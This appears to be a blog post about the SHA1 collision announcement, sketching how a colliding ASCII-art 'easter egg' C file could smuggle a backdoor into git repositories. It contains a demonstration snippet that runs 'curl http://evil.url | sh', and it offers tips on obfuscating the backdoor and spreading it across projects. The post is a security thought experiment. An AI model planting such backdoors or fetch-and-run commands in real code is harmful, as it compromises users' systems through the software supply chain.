Happy SHA1 collision day everybody!

If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files.

The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\

(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.)

Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks.

The "good" data chunk might then look like this:


And the "bad" data chunk like this:


Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is.

Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:

3*/LN  \.A
5*\LN   \.
5*\7N   /.
3*/7N  /.V

Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.

/* Call this at the top of main() */
check_display_easter_egg (char **argv) {
    if (strcmp(argv[1], "--easter-egg") == 0)
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url | sh");

Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.)

After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs.

Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them).

Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper.

You can pick either of these two lessons to take away:

  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo

  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.